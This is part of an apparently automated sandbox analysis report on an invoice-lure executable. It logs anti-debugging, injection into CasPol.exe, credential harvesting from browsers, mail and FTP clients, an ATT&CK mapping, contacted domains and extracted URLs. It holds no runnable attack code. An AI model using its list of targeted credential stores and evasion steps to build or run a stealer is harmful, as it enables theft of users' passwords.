            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB71E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB71C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB4480 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB886 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB5C40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB9AC mov ebx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB9AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB35B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA61CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB9D3 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB91F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB960 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB3625 LdrLoadDll,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1300000
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\AWB# 6174229350.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000003.00000002.88273977598.000000001DA51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1288, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 00000003.00000002.88273977598.000000001DA51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.88277094128.000000001DBAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1288, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000003.00000002.88273977598.000000001DA51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1288, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Ingress Tool Transfer
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API
            1
            Windows Service
            1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            1
            Credentials in Registry
            117
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            Exfiltration Over Bluetooth21
            Encrypted Channel
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)1
            Windows Service
            2
            Obfuscated Files or Information
            Security Account Manager331
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            Automated Exfiltration1
            Non-Standard Port
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)111
            Process Injection
            1
            DLL Side-Loading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            Scheduled Transfer2
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
            Masquerading
            LSA Secrets241
            Virtualization/Sandbox Evasion
            SSHKeyloggingData Transfer Size Limits123
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common241
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Access Token Manipulation
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job111
            Process Injection
            Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            AWB# 6174229350.exe23%VirustotalBrowse
            AWB# 6174229350.exe15%ReversingLabsWin32.Packed.Krynis
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsb414D.tmp\System.dll3%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\nsb414D.tmp\System.dll0%ReversingLabs
            SourceDetectionScannerLabelLinkDownload
            1.2.AWB# 6174229350.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
            1.0.AWB# 6174229350.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
            SourceDetectionScannerLabelLink
            hemegas.es0%VirustotalBrowse
            windowsupdatebg.s.llnwi.net0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%Avira URL Cloudsafe
            http://www.certplus.com/CRL/class3.crl00%Avira URL Cloudsafe
            http://www.e-me.lv/repository00%Avira URL Cloudsafe
            http://bKdsyNUZOlEkI4wH.orgt-4j0%Avira URL Cloudsafe
            http://www.acabogacia.org/doc00%Avira URL Cloudsafe
            http://crl.chambersign.org/chambersroot.crl00%Avira URL Cloudsafe
            http://ocsp.suscerte.gob.ve00%Avira URL Cloudsafe
            http://www.postsignum.cz/crl/psrootqca2.crl020%Avira URL Cloudsafe
            http://crl.dhimyotis.com/certignarootca.crl00%Avira URL Cloudsafe
            http://www.chambersign.org10%Avira URL Cloudsafe
            http://www.pkioverheid.nl/policies/root-policy00%Avira URL Cloudsafe
            http://www.suscerte.gob.ve/lcr0#0%Avira URL Cloudsafe
            http://bKdsyNUZOlEkI4wH.org0%Avira URL Cloudsafe
            http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%Avira URL Cloudsafe
            http://crl.ssc.lt/root-c/cacrl.crl00%Avira URL Cloudsafe
            http://postsignum.ttc.cz/crl/psrootqca2.crl00%Avira URL Cloudsafe
            http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%Avira URL Cloudsafe
            http://xXsQXu.com0%Avira URL Cloudsafe
            http://ca.disig.sk/ca/crl/ca_disig.crl00%Avira URL Cloudsafe
            http://crl1.comsign.co.il/crl/comsignglobalrootca.crl00%Avira URL Cloudsafe
            http://www.certplus.com/CRL/class3P.crl00%Avira URL Cloudsafe
            http://mail.hemegas.es0%Avira URL Cloudsafe
            http://www.suscerte.gob.ve/dpc00%Avira URL Cloudsafe
            http://www.certplus.com/CRL/class2.crl00%Avira URL Cloudsafe
            http://www.disig.sk/ca/crl/ca_disig.crl00%Avira URL Cloudsafe
            http://www.defence.gov.au/pki00%Avira URL Cloudsafe
            http://www.sk.ee/cps/00%Avira URL Cloudsafe
            http://www.globaltrust.info0=0%Avira URL Cloudsafe
            http://cps.root-x1.letsencrypt.org00%Avira URL Cloudsafe
            http://policy.camerfirma.com00%Avira URL Cloudsafe
            http://www.ssc.lt/cps030%Avira URL Cloudsafe
            http://ocsp.pki.gva.es00%Avira URL Cloudsafe
            http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?0%Avira URL Cloudsafe
            http://ca.mtin.es/mtin/ocsp00%Avira URL Cloudsafe
            http://cps.letsencrypt.org00%Avira URL Cloudsafe
            http://crl.ssc.lt/root-b/cacrl.crl00%Avira URL Cloudsafe
            http://web.ncdc.gov.sa/crl/nrcacomb1.crl00%Avira URL Cloudsafe
            http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G0%Avira URL Cloudsafe
            https://wwww.certigna.fr/autorites/0m0%Avira URL Cloudsafe
            http://www.dnie.es/dpc00%Avira URL Cloudsafe
            http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf00%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
            http://ca.mtin.es/mtin/DPCyPoliticas00%Avira URL Cloudsafe
            http://www.globaltrust.info00%Avira URL Cloudsafe
            http://www.certplus.com/CRL/class3TS.crl00%Avira URL Cloudsafe
            http://ac.economia.gob.mx/last.crl0G0%Avira URL Cloudsafe
            https://www.catcert.net/verarrel0%Avira URL Cloudsafe
            http://www.disig.sk/ca0f0%Avira URL Cloudsafe
            http://www.sk.ee/juur/crl/00%Avira URL Cloudsafe
            http://crl.chambersign.org/chambersignroot.crl00%Avira URL Cloudsafe
            http://crl.xrampsecurity.com/XGCA.crl00%Avira URL Cloudsafe
            http://certs.oati.net/repository/OATICA2.crl00%Avira URL Cloudsafe
            http://crl.oces.trust2408.com/oces.crl00%Avira URL Cloudsafe
            http://www.quovadis.bm00%Avira URL Cloudsafe
            http://crl.ssc.lt/root-a/cacrl.crl00%Avira URL Cloudsafe
            http://certs.oaticerts.com/repository/OATICA2.crl0%Avira URL Cloudsafe
            http://www.trustdst.com/certificates/policy/ACES-index.html00%Avira URL Cloudsafe
            http://certs.oati.net/repository/OATICA2.crt00%Avira URL Cloudsafe
            http://www.accv.es000%Avira URL Cloudsafe
            http://www.pkioverheid.nl/policies/root-policy-G200%Avira URL Cloudsafe
            https://www.netlock.net/docs0%Avira URL Cloudsafe
            http://www.e-trust.be/CPS/QNcerts0%Avira URL Cloudsafe
            http://ocsp.ncdc.gov.sa00%Avira URL Cloudsafe
            http://fedir.comsign.co.il/crl/ComSignCA.crl00%Avira URL Cloudsafe
            http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl00%Avira URL Cloudsafe
            http://web.ncdc.gov.sa/crl/nrcaparta1.crl0%Avira URL Cloudsafe
            http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;0%Avira URL Cloudsafe
            https://repository.luxtrust.lu00%Avira URL Cloudsafe
            http://cps.chambersign.org/cps/chambersroot.html00%Avira URL Cloudsafe
            http://r3.i.lencr.org/0U0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            hemegas.es
            37.59.226.102
            truefalseunknown
            drive.google.com
            142.250.181.238
            truefalse
              high
              googlehosted.l.googleusercontent.com
              216.58.212.161
              truefalse
                high
                windowsupdatebg.s.llnwi.net
                95.140.236.0
                truefalseunknown
                doc-00-as-docs.googleusercontent.com
                unknown
                unknownfalse
                  high
                  mail.hemegas.es
                  unknown
                  unknownfalse
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1CasPol.exe, 00000003.00000002.88273977598.000000001DA51000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.certplus.com/CRL/class3.crl0CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.e-me.lv/repository0CasPol.exe, 00000003.00000003.83844419373.0000000020B2F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://bKdsyNUZOlEkI4wH.orgt-4jCasPol.exe, 00000003.00000002.88277094128.000000001DBAE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.acabogacia.org/doc0CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.chambersign.org/chambersroot.crl0CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://ocsp.suscerte.gob.ve0CasPol.exe, 00000003.00000002.88290215195.0000000020B15000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83845370957.0000000020B15000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.postsignum.cz/crl/psrootqca2.crl02CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.dhimyotis.com/certignarootca.crl0CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.chambersign.org1CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.pkioverheid.nl/policies/root-policy0CasPol.exe, 00000003.00000003.83844419373.0000000020B2F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://repository.swisssign.com/0CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.suscerte.gob.ve/lcr0#CasPol.exe, 00000003.00000002.88290215195.0000000020B15000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83845370957.0000000020B15000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://bKdsyNUZOlEkI4wH.orgCasPol.exe, 00000003.00000002.88277094128.000000001DBAE000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.ssc.lt/root-c/cacrl.crl0CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://postsignum.ttc.cz/crl/psrootqca2.crl0CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://doc-00-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/5qkbcqatCasPol.exe, 00000003.00000003.83715098913.0000000001707000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.84839767170.0000000001707000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.84839431281.00000000016DC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88256357993.00000000016DC000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlCasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://xXsQXu.comCasPol.exe, 00000003.00000002.88273977598.000000001DA51000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://ca.disig.sk/ca/crl/ca_disig.crl0CasPol.exe, 00000003.00000003.84840339869.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88255831826.00000000016AB000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0CasPol.exe, 00000003.00000003.83847950858.0000000020AD0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.certplus.com/CRL/class3P.crl0CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://mail.hemegas.esCasPol.exe, 00000003.00000002.88276453202.000000001DB78000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.suscerte.gob.ve/dpc0CasPol.exe, 00000003.00000002.88290215195.0000000020B15000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83845370957.0000000020B15000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.certeurope.fr/reference/root2.crl0CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://repository.certum.pl/ctsca2021.cer0AWB# 6174229350.exefalse
                              high
                              http://www.certplus.com/CRL/class2.crl0CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.disig.sk/ca/crl/ca_disig.crl0CasPol.exe, 00000003.00000003.84840339869.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88255831826.00000000016AB000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.defence.gov.au/pki0CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://drive.google.com/CasPol.exe, 00000003.00000003.84840662617.000000000168F000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88255578225.0000000001690000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://www.sk.ee/cps/0CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.globaltrust.info0=CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://www.anf.esCasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.certum.pl/CPS0AWB# 6174229350.exefalse
                                        high
                                        http://pki.registradores.org/normativa/index.htm0CasPol.exe, 00000003.00000003.83848309152.0000000020B27000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88290367198.0000000020B27000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.84837616860.0000000020B27000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://cps.root-x1.letsencrypt.org0CasPol.exe, 00000003.00000003.84838384291.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285610550.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285277114.000000001FBEA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88276453202.000000001DB78000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://policy.camerfirma.com0CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.ssc.lt/cps03CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ocsp.pki.gva.es0CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.anf.es/es/address-direccion.htmlCasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.anf.es/address/)1(0&CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://ca.mtin.es/mtin/ocsp0CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
